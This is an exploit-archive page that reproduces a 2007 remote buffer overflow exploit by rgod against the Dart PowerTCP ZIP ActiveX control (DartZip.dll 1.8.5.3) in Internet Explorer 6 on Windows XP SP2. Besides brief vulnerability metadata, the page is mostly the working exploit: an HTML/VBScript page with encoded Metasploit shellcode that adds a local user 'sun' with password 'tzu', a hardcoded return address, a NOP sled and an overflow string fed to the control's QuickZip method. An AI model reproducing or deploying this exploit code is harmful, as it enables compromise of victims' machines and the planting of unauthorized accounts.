IE 6 / Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) remote buffer overflow exploit / xp sp2 it

vendor:

PowerTCP ZIP Compression Control

by:

rgod

7.5

CVSS

HIGH

Buffer Overflow

Unknown

CWE

Product Name: PowerTCP ZIP Compression Control

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2

Unknown

IE 6 / Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) remote buffer overflow exploit / xp sp2 it

This is a remote buffer overflow exploit targeting the Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) in IE 6 on Windows XP SP2. The exploit allows an attacker to add a user 'sun' with the password 'tzu'. The shellcode used is a Metasploit one.

Mitigation:

Unknown

Source

Exploit-DB raw data:

<!--
IE 6 / Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) remote
buffer overflow exploit / xp sp2 it
by rgod
site: retrogod.altervista.org
software site: www.dart.com
-->
<html>
<object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE99D4DD' id='DartZip'></object>
<script language='vbscript'>

'metasploit one, add a user 'sun' with pass 'tzu'
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54%42%30%42%30%42%30%4b%58%45%44%4e%43%4b%38%4e%57%45%50%4a%37%41%50%4f%4e%4b%48%4f%44%4a%51%4b%48%4f%45%42%42%41%50%4b%4e%49%34%4b%48%46%43%4b%38%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%58%42%4c%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e%46%4f%4b%33%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%35%46%32%41%30%4b%4e%48%56%4b%48%4e%50%4b%54%4b%38%4f%35%4e%41%41%50%4b%4e%4b%38%4e%51%4b%38%41%30%4b%4e%49%38%4e%45%46%42%46%50%43%4c%41%43%42%4c%46%46%4b%58%42%44%42%33%45%48%42%4c%4a%57%4e%50%4b%38%42%54%4e%30%4b%38%42%37%4e%41%4d%4a%4b%58%4a%36%4a%30%4b%4e%49%50%4b%58%42%38%42%4b%42%50%42%50%42%30%4b%38%4a%56%4e%43%4f%55%41%53%48%4f%42%36%48%55%49%48%4a%4f%43%58%42%4c%4b%47%42%45%4a%36%42%4f%4c%58%46%30%4f%45%4a%46%4a%49%50%4f%4c%38%50%30%47%45%4f%4f%47%4e%43%36%4d%56%46%36%50%32%45%46%4a%47%45%56%42%52%4f%52%43%36%42%52%50%46%45%56%46%47%42%52%45%47%43%37%45%56%44%57%42%42%43%57%45%47%50%56%42%52%46%47%4c%37%45%47%42%52%4f%42%41%34%46%34%46%54%42%42%48%42%48%32%42%52%50%46%45%36%46%57%42%52%4e%46%4f%36%43%56%41%46%4e%36%47%56%44%47%4f%36%45%57%42%37%42%52%41%54%46%46%4d%56%49%46%50%56%49%36%43%37%46%47%44%37%41%56%46%47%4f%56%44%37%43%37%42%52%43%57%45%57%50%46%42%42%4f%32%41%34%46%54%46%54%42%50%5a")

EIP = unescape("%67%31%41%7e") 'call esp user32.dll

Source=String(1024, "A") + EIP + String(36, unescape("%90")) + shellcode  + String(24, unescape("%90"))
Destination="default"
IncludeSubs=True
PreservePath=True
Password="default"
Encryption=1

DartZip.QuickZip Source ,Destination ,IncludeSubs ,PreservePath ,Password ,Encryption

</script>
</html>

# milw0rm.com [2007-05-25]